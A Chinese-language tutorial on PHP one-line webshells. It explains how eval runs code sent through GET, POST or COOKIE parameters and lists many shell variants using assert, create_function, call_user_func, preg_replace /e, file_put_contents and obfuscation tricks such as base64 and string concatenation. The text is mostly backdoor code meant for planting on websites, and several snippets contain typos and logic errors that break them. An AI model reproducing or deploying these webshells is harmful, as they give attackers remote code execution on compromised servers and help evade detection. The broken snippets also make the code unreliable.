原理:我一句话木马用我们可以通过GET 、POST 、COOKIE这三种方式向一个网站提交数据,一句话木马用$_GET[' ']、$_POST[' ']、$_COOKIE[' '] 接收我们传递的数据,并把接收的数据传递给一句话木马中执行命令的函数,进而执行命令。
例如:<?php @eval($_POST['a']);?>
其中 eval 就是执行命令的函数,$_POST['a'] 就是接收的数据。 eval函数把接收的数据当作PHP代码来执行。这样我们就能够让插入了一句话木马的网站执行我们传递过去的任意PHP语句。
使用 其他函数制作一句话木马
assert函数
<?php assert[@$_POST['a']);?>
creat_funcction函数
<?php $fun = creat_function('',$_POST['a']); $fun(); ?>
把用户传递的数据生成一个函数fun(),然后再执行fun()
call_user_func回调函数
<?php @call_user_func(assert,$_POST['a']); ?>
call_user_func这个函数可以调用其他函数,被调用的函数是call_user_func的第一个函数,被调用的函数的参数是call_user_func的第二个参数。
preg_replace函数
<?php @preg_replace("/abcde/e",$_POST['a'],"abcdefg"); ?>
preg_place函数的第一个参数是正则,按照格式,表达式在两个"/"之间。如果我们在这个表达式的末尾加上"e",那么这个函数的第二个参数就会被当作代码执行。
file_put_contents函数
<?php $test='<?php $a=$a_POST["cmd"];assert($a);?>'; file_put_contents("Trojan.php",$test); ?>
函数功能:生成一个文件,第一个参数是文件名,第二个参数是文件内容。
str_replace函数
<?php $a=str_replace("Walao","","eWaldoval"); $a=(@$_POST['a']); ?>
函数功能:第三个参数中,查找第一个参数,并替换成第二个参数。这里第二个参数为空字符串,这就相当于删除了"Waldo" 。
base64_decode函数
<?php $a=base64_decode("ZXZhbA==") $a($_POST['a']); ?>
parse_str函数
<?php $str="a=eval"; parse_str($str); $a($a_POST['a']); ?>
PHP变量函数
①
<?php $a = "eval"; $a(@$_POST['a']); ?>
第三行使用了变量函数$a,变量存储了函数名eval,便可以直接使用变量替代函数名。
②
<?php $bb="eval"; $a="bb"; $$aa($_POST['a']); ?>
"."操作符
<?php $a="e"."v"; $b="a"."l"; $c=$a.$b; $c=($_POST['a']); ?>
多种函数组合
例子
<?php function fun() {return $_POST['a'];} @preg_replace("/test/e",fun(),"test test test"); ?>